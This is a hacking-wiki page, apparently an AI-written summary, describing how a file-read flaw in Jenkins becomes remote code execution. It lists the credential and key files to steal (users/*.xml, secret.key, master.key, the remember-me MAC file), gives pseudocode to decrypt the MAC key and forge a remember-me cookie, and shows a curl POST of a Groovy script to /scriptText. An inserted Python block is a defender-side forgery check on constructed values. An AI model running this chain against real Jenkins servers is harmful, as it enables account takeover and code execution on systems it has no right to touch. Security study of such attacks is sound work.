Jenkins Arbitrary File Read to RCE via "Remember Me"
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
In this blog post it is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/
This is an AI-created summary of the part of the post where the crafting of an arbitrary cookie is abused to get RCE through a local file read, until I have time to create a summary on my own:
Attack Prerequisites
- Feature Requirement: "Remember me" must be enabled (default setting).
- Access Levels: Attacker needs Overall/Read permissions.
- Secret Access: Ability to read both binary and textual content from key files.
Detailed Exploitation Process
Step 1: Data Collection
User Information Retrieval
- Access user configuration and secrets from $JENKINS_HOME/users/*.xml for each user to gather:
  - Username
  - User seed
  - Timestamp
  - Password hash
Secret Key Extraction
- Extract the cryptographic keys used for signing the cookie:
  - Secret Key: $JENKINS_HOME/secret.key
  - Master Key: $JENKINS_HOME/secrets/master.key
  - MAC Key File: $JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac
Step 2: Cookie Forging
Token Preparation
- Calculate Token Expiry Time:
    tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time
- Concatenate Data for Token:
    token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
MAC Key Decryption
- Decrypt MAC Key File:
    key = toAes128Key(masterKey)            // Convert master key to AES128 key format
    decrypted = AES.decrypt(macFile, key)   // Decrypt the .mac file
    if not decrypted.hasSuffix("::::MAGIC::::") return ERROR;
    macKey = decrypted.withoutSuffix("::::MAGIC::::")
Signature Computation
- Compute HMAC SHA256:
    mac = HmacSHA256(token, macKey)          // Compute HMAC using the token and MAC key
    tokenSignature = bytesToHexString(mac)   // Convert the MAC to a hexadecimal string
Cookie Encoding
- Generate Final Cookie:
    cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature) // Base64 encode the cookie data
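Added, defender-side example (not code from the post or from Jenkins): a check that takes the same inputs the post lists and classifies a remember-me cookie, since a forged token carries a valid MAC and its only structural tell is an expiry the server would never have issued. The user record, secret.key value, decrypted MAC key and the 14-day lifetime policy are constructed or assumed values.

```python
import base64
import hashlib
import hmac

# Constructed sample data, not real Jenkins secrets: a user record (from users/*.xml), a stand-in secret.key and a stand-in decrypted MAC key.
USERS = {"admin": {"seed": "c0ffee42deadbeef"}}
SECRET_KEY = "constructed-secret-key"
MAC_KEY = b"constructed-mac-key-bytes"
MAX_TTL_MS = 14 * 24 * 3600 * 1000  # assumed server-side remember-me lifetime (hypothetical policy)
NOW_MS = 1_700_000_000_000          # fixed clock so the example is deterministic

def expected_signature(username, expiry_ms, seed, secret_key, mac_key):
    """Hex HMAC-SHA256 over username:expiry:seed:secretKey, the token layout from the post."""
    token = f"{username}:{expiry_ms}:{seed}:{secret_key}".encode()
    return hmac.new(mac_key, token, hashlib.sha256).hexdigest()

def check_remember_me(cookie, users=USERS, secret_key=SECRET_KEY, mac_key=MAC_KEY,
                      max_ttl_ms=MAX_TTL_MS, now_ms=NOW_MS):
    """Classify one cookie value; a valid MAC with a lifetime the server never issues marks a forgery."""
    try:
        parts = base64.b64decode(cookie, validate=True).decode().split(":")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return "bad-format"
    if len(parts) != 3 or not parts[1].isdigit():
        return "bad-format"
    username, expiry_ms, signature = parts[0], int(parts[1]), parts[2]
    user = users.get(username)
    if user is None:
        return "unknown-user"
    if expiry_ms <= now_ms:
        return "expired"
    want = expected_signature(username, expiry_ms, user["seed"], secret_key, mac_key)
    if not hmac.compare_digest(want, signature):
        return "bad-signature"  # wrong MAC key, rotated user seed, or tampered fields
    if expiry_ms - now_ms > max_ttl_ms:
        return "ttl-exceeds-policy"
    return "ok"

def sample_verdicts():
    """Run the check over constructed cookies; only the first is one the server would issue."""
    enc = lambda u, exp, sig: base64.b64encode(f"{u}:{exp}:{sig}".encode()).decode()
    sig = lambda exp, seed: expected_signature("admin", exp, seed, SECRET_KEY, MAC_KEY)
    soon, far = NOW_MS + 3_600_000, NOW_MS + 365 * 24 * 3600 * 1000
    return {
        "normal": check_remember_me(enc("admin", soon, sig(soon, USERS["admin"]["seed"]))),
        "one_year_ttl": check_remember_me(enc("admin", far, sig(far, USERS["admin"]["seed"]))),
        "rotated_seed": check_remember_me(enc("admin", soon, sig(soon, "old-seed"))),
        "no_such_user": check_remember_me(enc("ghost", soon, "00")),
        "garbage": check_remember_me("not-base64!"),
    }
```

Rotating the user seed or the MAC key turns every previously issued cookie into `bad-signature`, which is the cleanup step after a suspected exposure of these files.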
Step 3: Code Execution
Session Authentication
- Fetch CSRF and Session Tokens:
  - Make a request to /crumbIssuer/api/json to obtain Jenkins-Crumb.
  - Capture JSESSIONID from the response, which will be used in conjunction with the remember-me cookie.
Command Execution Request
- Send a POST Request with Groovy Script:
    curl -X POST "$JENKINS_URL/scriptText" \
      --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
      --header "Jenkins-Crumb: $CRUMB" \
      --header "Content-Type: application/x-www-form-urlencoded" \
      --data-urlencode "script=$SCRIPT"
- The Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
The curl command above shows the headers and cookies a request to Jenkins needs in order to have the script executed.